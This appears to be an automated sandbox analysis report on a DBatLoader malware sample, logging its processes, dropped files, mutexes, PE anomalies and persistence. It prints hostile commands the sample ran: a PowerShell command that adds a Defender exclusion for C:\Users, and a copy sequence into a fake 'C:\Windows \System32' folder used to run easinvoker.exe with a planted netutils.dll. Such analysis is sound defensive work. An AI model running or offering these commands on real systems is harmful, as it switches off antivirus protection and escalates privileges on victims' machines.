Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Elpuxpki.PIF "C:\Users\Public\Libraries\Elpuxpki.PIF"
Source: unknown	Process created: C:\Users\Public\Libraries\Elpuxpki.PIF "C:\Users\Public\Libraries\Elpuxpki.PIF"
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" "	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6	Jump to behavior
Source: C:\Windows \System32\easinvoker.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jygeob4o.kex.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
Source: C:\Windows\SysWOW64\colorcpl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-QBZ2IM
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

Directory created: C:\Program Files\Common Files\System\symsrv.dll

Jump to behavior

Source: 0vJrK0NCd1.exe

Static file information: File size 1131463 > 1048576

Source:	Binary string: wkernel32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371668032.0000000002E62000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002D6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypt32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CLBCatQ.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.393192241.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.399135721.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002BAB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe
Source:	Binary string: fastprox.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: %s\%.s%s%s%s\%.s (%s)%s%s.partialaction_closesearch_fieldsmartscreen_rowsmartscreen_oldclient_rowlistview_regionaction_clearaction_optionsaction_smartscreen_buttonsearch_glyphdownload_boxcuetextcleardownload_selectormaininetcore\ieframe\browseui\downloadmanager\downloadfilecopier.cpp.automaticdestinations-ms.bat.cab.cat.appx.appxbundle.appxpackage.customdestinations-ms.der.dmp.dsft.cdxml.cer.cmd.cookie.iso.jar.js.lnk.efi.etl.fon.ini.msp.msu.mui.nst.mp.mpb.msip.msm.p12.p7b.p7c.p7m.olb.ost.otf.p10.pem.pfm.pfx.ps1.p7r.p7s.p7x.pdb.psm1.pst.reg.rll.ps1xml.psc1.psd1.psf.sys.ttc.ttf.vbs.sft.spc.spkg.sst.vsi.vsix.wfs.wim.vhd.vhdx.vmcx.vmrsinetcore\ieframe\browseui\downloadmanager\downloadsecurity.cpp.winmd.wsf.xap source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wUxTheme.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: combase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ieframe.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wUxTheme.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002D6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ole32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fastprox.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: version.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: apphelp.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: version.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: iertutil.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ieframe.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
Source:	Binary string: CLBCatQ.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: apphelp.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: iertutil.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypt32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 0vJrK0NCd1.exe, type: SAMPLE
Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.Elpuxpki.PIF.2e2056c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.0vJrK0NCd1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.Elpuxpki.PIF.2e2056c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\Public\Libraries\Elpuxpki.PIF, type: DROPPED

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E36C48 push eax; ret	0_3_04E36C84
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E36C48 push eax; ret	0_3_04E36C84
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E36C48 push eax; ret	0_3_04E36C84
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3BEA0 push ecx; mov dword ptr [esp], edx	0_3_04E3BEA5
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3EFA0 push eax; ret	0_3_04E3EFDC
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3EFA0 push eax; ret	0_3_04E3EFDC
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E3EFA0 push eax; ret	0_3_04E3EFDC
Source: C:\Users\user\Desktop\0vJrK0NCd1.exe	Code function: 0_3_04E475D4 push eax; ret	0_3_04E47610
Source: C:\Windows \System32\easinvoker.exe	Code function: 22_2_613CF021 pushfq ; iretd	22_2_613CF02A
Source: C:\Windows \System32\easinvoker.exe	Code function: 22_2_613CFD00 pushfq ; ret	22_2_613CFD01
Source: C:\Windows \System32\easinvoker.exe	Code function: 22_2_613D0DFE push rsp; iretd	22_2_613D0DFF

Source: easinvoker.exe.0.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: /4
Source: netutils.dll.0.dr	Static PE information: section name: /19
Source: netutils.dll.0.dr	Static PE information: section name: /31
Source: netutils.dll.0.dr	Static PE information: section name: /45
Source: netutils.dll.0.dr	Static PE information: section name: /57
Source: netutils.dll.0.dr	Static PE information: section name: /70
Source: netutils.dll.0.dr	Static PE information: section name: /81
Source: netutils.dll.0.dr	Static PE information: section name: /92
Source: easinvoker.exe.17.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.19.dr	Static PE information: section name: .....
Source: netutils.dll.19.dr	Static PE information: section name: .....
Source: netutils.dll.19.dr	Static PE information: section name: ......
Source: netutils.dll.19.dr	Static PE information: section name: ......
Source: netutils.dll.19.dr	Static PE information: section name: ......
Source: netutils.dll.19.dr	Static PE information: section name: ....
Source: netutils.dll.19.dr	Static PE information: section name: ......
Source: netutils.dll.19.dr	Static PE information: section name: ......
Source: netutils.dll.19.dr	Static PE information: section name: ....
Source: netutils.dll.19.dr	Static PE information: section name: ....
Source: netutils.dll.19.dr	Static PE information: section name: ......
Source: netutils.dll.19.dr	Static PE information: section name: /4
Source: netutils.dll.19.dr	Static PE information: section name: /19
Source: netutils.dll.19.dr	Static PE information: section name: /31
Source: netutils.dll.19.dr	Static PE information: section name: /45
Source: netutils.dll.19.dr	Static PE information: section name: /57
Source: netutils.dll.19.dr	Static PE information: section name: /70
Source: netutils.dll.19.dr	Static PE information: section name: /81
Source: netutils.dll.19.dr	Static PE information: section name: /92

Source: initial sample

Static PE information: section where entry point is pointing to: .....

Source: netutils.dll.0.dr	Static PE information: real checksum: 0x25371 should be: 0x20ddd
Source: netutils.dll.19.dr	Static PE information: real checksum: 0x25371 should be: 0x20ddd
Source: symsrv.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1f436
Source: Elpuxpki.PIF.0.dr	Static PE information: real checksum: 0x0 should be: 0x12060e
Source: 0vJrK0NCd1.exe	Static PE information: real checksum: 0x0 should be: 0x12060e
Source: kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x43c42

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe

Executable created and started: C:\Windows \System32\easinvoker.exe

Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

File created: C:\Users\Public\Libraries\Elpuxpki.PIF

Jump to dropped file

